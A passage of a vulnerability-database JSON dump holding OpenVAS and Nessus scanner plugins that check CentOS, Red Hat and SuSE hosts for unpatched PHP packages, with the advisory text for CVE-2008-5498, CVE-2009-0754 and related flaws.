USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Web server.\n\n A heap-based buffer overflow flaw was found in PHP's mbstring extension. A\n remote attacker able to pass arbitrary input to a PHP script using mbstring\n conversion functions could cause the PHP interpreter to crash or,\n possibly, execute arbitrary code. (CVE-2008-5557)\n \n A flaw was found in the handling of the "mbstring.func_overload"\n configuration setting. A value set for one virtual host, or in a user's\n .htaccess file, was incorrectly applied to other virtual hosts on the same\n server, causing the handling of multibyte character strings to not work\n correctly. (CVE-2009-0754)\n \n A buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\n script allowed a remote attacker to load a carefully crafted font file, it\n could cause the PHP interpreter to crash or, possibly, execute arbitrary\n code. (CVE-2008-3658)\n \n A flaw was found in the way PHP handled certain file extensions when\n running in FastCGI mode. If the PHP interpreter was being executed via\n FastCGI, a remote attacker could create a request which would cause the PHP\n interpreter to crash. (CVE-2008-3660)\n \n A memory disclosure flaw was found in the PHP gd extension's imagerotate\n function. A remote attacker able to pass arbitrary values as the\n "background color" argument of the function could, possibly, view portions\n of the PHP interpreter's memory. (CVE-2008-5498)\n \n All php users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. The httpd web server\n must be restarted for the changes to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on CentOS 3\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-April/015722.html\");\n script_id(880871);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:0337\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_name(\"CentOS Update for php CESA-2009:0337 centos3 i386\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:37", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0337.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the mbstring.func_overload\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\nbackground color argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-04-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63755", "id": "OPENVAS:63755", "title": "RedHat Security Advisory RHSA-2009:0337", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0337.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0337 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0337.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the mbstring.func_overload\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\nbackground color argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(63755);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-15 22:11:00 +0200 (Wed, 15 Apr 2009)\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0337\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0337.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:12:27", "bulletinFamily": "scanner", "description": "php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate function of the gd extension potentially allowed attackers to read portions of memory. (CVE-2008-5498)\n\n - the mbstring.func_overload in .htaccess was applied to other virtual hosts on th same machine (CVE-2009-0754)", "modified": "2016-12-21T00:00:00", "id": "SUSE_11_APACHE2-MOD_PHP5-090319.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41368", "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : PHP5 (SAT Patch Number 666)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41368);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"SuSE 11 Security Update : PHP5 (SAT Patch Number 666)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory. (CVE-2008-5498)\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=471419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=480948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5498.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0754.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 666.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"apache2-mod_php5-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-bcmath-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-bz2-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-calendar-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ctype-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-curl-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dba-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dbase-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dom-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-exif-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-fastcgi-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ftp-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gd-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gettext-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gmp-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-hash-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-iconv-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-json-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ldap-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mbstring-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mcrypt-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mysql-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-odbc-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-openssl-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pcntl-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pdo-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pear-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pgsql-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pspell-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-shmop-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-snmp-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-soap-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-suhosin-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvmsg-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvsem-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvshm-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-tokenizer-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-wddx-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlreader-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlrpc-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlwriter-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xsl-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-zip-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-zlib-5.2.6-50.18.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:12:29", "bulletinFamily": "scanner", "description": "Missing bounds checks of an error in the imageRotate function of the gd extension potentially allowed attackers to read portions of memory.\n(CVE-2008-5498)\n\nThe mbstring.func_overload in .htaccess was applied to other virtual hosts on th same machine. (CVE-2009-0754)", "modified": "2016-12-22T00:00:00", "id": "SUSE_APACHE2-MOD_PHP5-6069.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41476", "published": "2009-09-24T00:00:00", "title": "SuSE 10 Security Update : PHP5 (ZYPP Patch Number 6069)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41476);\n script_version (\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:45 $\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"SuSE 10 Security Update : PHP5 (ZYPP Patch Number 6069)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Missing bounds checks of an error in the imageRotate function of the\ngd extension potentially allowed attackers to read portions of memory.\n(CVE-2008-5498)\n\nThe mbstring.func_overload in .htaccess was applied to other virtual\nhosts on th same machine. (CVE-2009-0754)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5498.html\"\n 